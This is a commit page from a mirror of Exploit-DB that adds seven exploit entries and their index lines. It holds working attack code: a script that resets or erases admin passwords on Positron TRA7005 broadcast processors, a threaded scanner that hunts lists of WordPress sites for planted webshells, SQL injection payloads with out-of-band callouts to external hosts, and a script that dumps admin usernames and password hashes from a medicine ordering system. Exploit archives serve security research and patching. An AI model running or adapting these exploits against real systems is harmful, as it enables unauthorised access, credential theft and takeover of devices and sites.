bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-04-09

Browse source 
8 changes to exploits/shellcodes/ghdb

Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass

Best Student Result Management System v1.0 - Multiple SQLi

Daily Expense Manager 1.0 - 'term' SQLi

Human Resource Management System v1.0 - Multiple SQLi

Open Source Medicine Ordering System v1.0 - SQLi

Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload

AnyDesk 7.0.15 - Unquoted Service Path
This commit is contained in:
Exploit-DB 2024-04-09 00:16:23 +00:00
parent a06b0db78d
commit 034fafa3fd
8 changed files with 513 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

108
exploits/hardware/remote/51970.py Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
# Author: LiquidWorm
# Vendor: Positron srl
# Product web page: https://www.positron.it
# https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
# Affected version: 1.20
# TRA7K5_REV107
# TRA7K5_REV106
# TRA7K5_REV104
# TRA7K5_REV102
#
# Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
# guarantee an excellent quality-price ratio in compliance with current regulations and
# intended for individual broadcasters or radio networks. All models in the TRA7000 series
# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
# for both analogue and digital audio inputs, change-over emergency switching between any
# input with adjustable thresholds and intervention times, both in the switching phase on
# the secondary source and in the return phase to the primary source. Ethernet connection
# with Web-Server (optional) for total control and management of the device. Advanced BYPASS
# system between MPX input and outputs, active on operating and power supply anomalies and
# can also be activated remotely.
#
# Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
# bypass through a direct and unauthorized access to the password management functionality.
# The vulnerability allows attackers to bypass Digest authentication by manipulating the
# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
# value or remove it entirely. This grants unauthorized access to protected areas (/user,
# /operator, /admin) of the application without requiring valid credentials, compromising
# the device's system security.
#
# Tested on: Positron Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5813
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
#
#
# 22.03.2024
#
#
import requests,sys
print("""
______________________________________
for
Positron Digital Signal Processor
ZSL-2024-5813
______________________________________
""")
if len(sys.argv) != 4:
print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
sys.exit(1)
ip = sys.argv[1]
ut = sys.argv[2]
wa = sys.argv[3]
valid_ut = ['user', 'oper', 'admin']
if ut.lower() not in valid_ut:
print("Invalid user type! Use 'user', 'oper', or 'admin'.")
sys.exit(1)
url = f'http://{ip}/_Passwd.html'
did = f'http://{ip}/_Device.html'
try:
r = requests.get(did)
if r.status_code == 200 and 'TRA7K5' in r.text:
print("Vulnerable processor found!")
else:
print("Not Vulnerable or not applicable. Exploit exiting.")
sys.exit(1)
except requests.exceptions.RequestException as e:
print(f"Error checking device: {e}")
sys.exit(1)
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept-Language': 'mk-MK,en;q=0.6',
'Accept-Encoding': 'gzip, deflate',
'User-Agent' : 'R-Marina/11.9',
'Accept' : '*/*'
}
payload = {}
if wa.lower() == 'erase':
payload[f'PSW_{ut.capitalize()}'] = 'NONE'
else:
payload_key = f'PSW_{ut.capitalize()}'
payload[payload_key] = wa
#print(payload)
r = requests.post(url, headers=headers, data=payload)
print(r.status_code)
print(r.text)

141
exploits/php/webapps/51969.py Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
requests.urllib3.disable_warnings()
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
Mobile Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'Referer': 'www.google.com'
}
def URLdomain(url):
if url.startswith("http://"):
url = url.replace("http://", "")
elif url.startswith("https://"):
url = url.replace("https://", "")
if '/' in url:
url = url.split('/')[0]
return url
def check_security(url):
fg = success_color
fr = error_color
try:
url = 'http://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/travelscape/json.php', headers=headers,
allow_redirects=True, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/travelscape/json.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/aahana/json.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/aahana/json.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
check = requests.get(url + '/wp-content/themes/travel/issue.php',
headers=headers, allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url +
'/wp-content/themes/travel/issue.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url + '/about.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/about.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/digital-download/new.php', headers=headers,
allow_redirects=True, timeout=15)
if '#0x2525' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('digital-download.txt', 'a').write(url +
'/wp-content/themes/digital-download/new.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'http://' + URLdomain(url)
check = requests.get(url + '/epinyins.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/epinyins.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'https://' + URLdomain(url)
check = requests.get(url + '/wp-admin/dropdown.php',
headers=headers, allow_redirects=True, verify=False, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'Simple Shell' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('dummyyummy.txt', 'a').write(url +
'/wp-content/plugins/dummyyummy/wp-signup.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
except Exception as e:
print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
try:
url_file_path = sys.argv[1]
except IndexError:
url_file_path = input(f"{info_color}Enter the path to the file
containing URLs: ")
if not os.path.isfile(url_file_path):
print(f"{error_color}[ERROR] The specified file path is
invalid.")
sys.exit(1)
try:
urls_to_check = [line.strip() for line in open(url_file_path, 'r',
encoding='utf-8').readlines()]
except Exception as e:
print(f"{error_color}[ERROR] An error occurred while reading the
file: {e}")
sys.exit(1)
pool = ThreadPool(20)
pool.map(check_security, urls_to_check)
pool.close()
pool.join()
print(f"{info_color}Security check process completed successfully.
Results are saved in corresponding files.")
if __name__ == "__main__":
main()

52
exploits/php/webapps/51971.txt Normal file
View file

@ -0,0 +1,52 @@
## Title: Human Resource Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/02/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The cityedit parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'
was submitted in the cityedit parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: cityedit (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select
load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''
ELSE 0x28 END)) AND 'GMzs'='GMzs
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT
(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK
Type: time-based blind
Title: MySQL > 5.0.12 AND time-based blind (heavy query)
Payload: cityedit=22'+(select
load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''
AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR
1) AND 'Jtnd'='Jtnd
---
```

44
exploits/php/webapps/51972.txt Normal file
View file

@ -0,0 +1,44 @@
## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The nid parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'
was submitted in the nid parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.
The attacker can get all information from the system by using this
vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM
(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT
NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```

37
exploits/php/webapps/51973.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74
## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.
## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd
## Vulnerable HTTP parameter:
term (GET)
## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-
## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
$data[] = $row['pname'];
}
//return json data
echo json_encode($data);
?>

84
exploits/php/webapps/51974.py Executable file
View file

@ -0,0 +1,84 @@
# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi
# Author : Onur Karasalihoğlu
# Date : 27/02/2024
# Sample Usage
% python3 omos_sqli_exploit.py https://target.com
Available Databases:
1. information_schema
2. omosdb
Please select a database to use (enter number): 2
You selected: omosdb
Extracted Admin Users Data:
1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin
2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith
'''
import requests
import re
import sys
def fetch_database_names(domain):
url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"
try:
# HTTP request
response = requests.get(url)
response.raise_for_status() # exception for 4xx and 5xx requests
# data extraction
pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
extracted_data = pattern.search(response.text)
if extracted_data:
databases = extracted_data.group(1).split(',')
databases = [db.replace('"', '') for db in databases]
print("Available Databases:")
for i, db in enumerate(databases, start=1):
print(f"{i}. {db}")
# users should select omos database
choice = int(input("Please select a database to use (enter number): "))
if 0 < choice <= len(databases):
selected_db = databases[choice - 1]
print(f"You selected: {selected_db}")
fetch_data(domain, selected_db)
else:
print("Invalid selection.")
else:
print("No data extracted.")
except requests.RequestException as e:
print(f"HTTP Request failed: {e}")
def fetch_data(domain, database_name):
url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"
try:
# HTTP request
response = requests.get(url)
response.raise_for_status() # exception for 4xx and 5xx requests
# data extraction
pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
extracted_data = pattern.search(response.text)
if extracted_data:
print("Extracted Admin Users Data:")
data = extracted_data.group(1)
rows = data.split('","')
for row in rows:
clean_row = row.replace('"', '')
user_details = clean_row.split(',')
print(" | ".join(user_details))
else:
print("No data extracted.")
except requests.RequestException as e:
print(f"HTTP Request failed: {e}")
def main():
if len(sys.argv) != 2:
print("Usage: python3 omos_sqli_exploit.py <domain>")
sys.exit(1)
fetch_database_names(sys.argv[1])
if __name__ == "__main__":
main()

40
exploits/windows/local/51968.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path
# Date: 2024-04-01
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 7.0.15
# Tested on: Windows 10 Pro x64
1. Description:
The Anydesk installs as a service with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: anydesk
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
--service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AnyDesk Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation

7
files_exploits.csv
View file

@ -3865,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2016-11-08,0,,,,,,
24494,exploits/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",remote,hardware,23,2013-02-14,2016-08-03,1,,"Metasploit Framework (MSF)",,,,http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf
35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",remote,hardware,,2011-07-05,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/48560/info
51970,exploits/hardware/remote/51970.py,"Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass",2024-04-08,LiquidWorm,remote,hardware,,2024-04-08,2024-04-08,0,,,,,,
51158,exploits/hardware/remote/51158.txt,"ProLink PRS1841 PLDT Home fiber - Default Password",2023-03-31,"Lawrence Amer",remote,hardware,,2023-03-31,2023-04-03,0,,,,,,
32469,exploits/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",remote,hardware,,2008-10-09,2014-03-24,1,CVE-2008-5869;OSVDB-51260,,,,,https://www.securityfocus.com/bid/31666/info
36503,exploits/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,9993,2015-03-26,2015-03-26,0,CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,"Metasploit Framework (MSF)",,,,https://github.com/d3vpp/metasploit-modules
@ -14821,6 +14822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-06-04,1,,,,,,
51972,exploits/php/webapps/51972.txt,"Best Student Result Management System v1.0 - Multiple SQLi",2024-04-08,nu11secur1ty,webapps,php,,2024-04-08,2024-04-08,0,,,,,,
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@ -16733,6 +16735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5916,exploits/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Remote File Inclusion",2008-06-23,CraCkEr,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-56271;CVE-2008-6636;CVE-2008-6635;OSVDB-46489,,,,,
4097,exploits/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,webapps,php,,2007-06-23,,1,OSVDB-36302;CVE-2007-3431,,,,,
41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php,,2017-03-07,2017-03-07,0,,,,,,
51973,exploits/php/webapps/51973.txt,"Daily Expense Manager 1.0 - 'term' SQLi",2024-04-08,"Stefan Hesselman",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80,2019-08-08,2019-08-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comexpense.zip,
48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,,2020-08-07,2020-08-07,0,,,,,,
48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,,2020-08-04,2020-08-04,0,,,,,,
@ -19773,6 +19776,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
51971,exploits/php/webapps/51971.txt,"Human Resource Management System v1.0 - Multiple SQLi",2024-04-08,nu11secur1ty,webapps,php,,2024-04-08,2024-04-08,0,,,,,,
51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",webapps,php,,2014-12-10,2014-12-10,0,OSVDB-115638;OSVDB-115637;OSVDB-115636,,,,,
@ -25103,6 +25107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14459,exploits/php/webapps/14459.txt,"Open Realty 2.x/3.x - Persistent Cross-Site Scripting",2010-07-24,K053,webapps,php,,2010-07-24,2010-07-24,1,,,,,,
25650,exploits/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,webapps,php,,2005-05-11,2013-05-23,1,CVE-2005-1587;OSVDB-16330,,,,,https://www.securityfocus.com/bid/13599/info
11496,exploits/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",webapps,php,,2010-02-17,,1,,,,,,
51974,exploits/php/webapps/51974.py,"Open Source Medicine Ordering System v1.0 - SQLi",2024-04-08,"Onur Karasalihoğlu",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
39868,exploits/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",webapps,php,80,2016-05-30,2016-05-30,1,,,,,,
41047,exploits/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,,2018-10-25,2018-10-25,0,,,,,,
@ -34083,6 +34088,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29332,exploits/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",webapps,php,,2013-11-02,2013-11-02,0,OSVDB-101020,,,,,
38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,webapps,php,,2013-11-01,2015-11-27,1,,,,,,https://www.securityfocus.com/bid/63523/info
38077,exploits/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' SQL Injection",2012-11-29,"Ashiyane Digital Security Team",webapps,php,,2012-11-29,2015-09-03,1,OSVDB-88293,,,,,https://www.securityfocus.com/bid/56745/info
51969,exploits/php/webapps/51969.py,"Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload",2024-04-08,"Milad karimi",webapps,php,,2024-04-08,2024-04-08,0,,,,,,
36195,exploits/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,webapps,php,,2011-09-24,2015-02-27,1,CVE-2011-3859;OSVDB-75954,,,,,https://www.securityfocus.com/bid/49896/info
39895,exploits/php/webapps/39895.php,"WordPress Theme Uncode 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,webapps,php,80,2016-06-06,2016-06-06,0,,,,,,
39296,exploits/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",webapps,php,,2014-09-08,2016-01-23,1,,,,,,https://www.securityfocus.com/bid/69670/info
@ -39638,6 +39644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,,2020-03-13,2020-03-13,0,,,,,,
40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows,,2016-09-22,2016-09-22,0,,,,,http://www.exploit-db.comAnyDesk.exe,
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,,2020-01-07,2020-01-07,0,,,,,,
51968,exploits/windows/local/51968.txt,"AnyDesk 7.0.15 - Unquoted Service Path",2024-04-08,"Milad karimi",local,windows,,2024-04-08,2024-04-08,0,,,,,,
49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,,2021-02-09,2021-02-09,0,,,,,,
16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,OSVDB-107970,,,http://www.exploit-db.com/screenshots/idlt16500/16132.png,,
16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16133.png,,

Can't render this file because it is too large.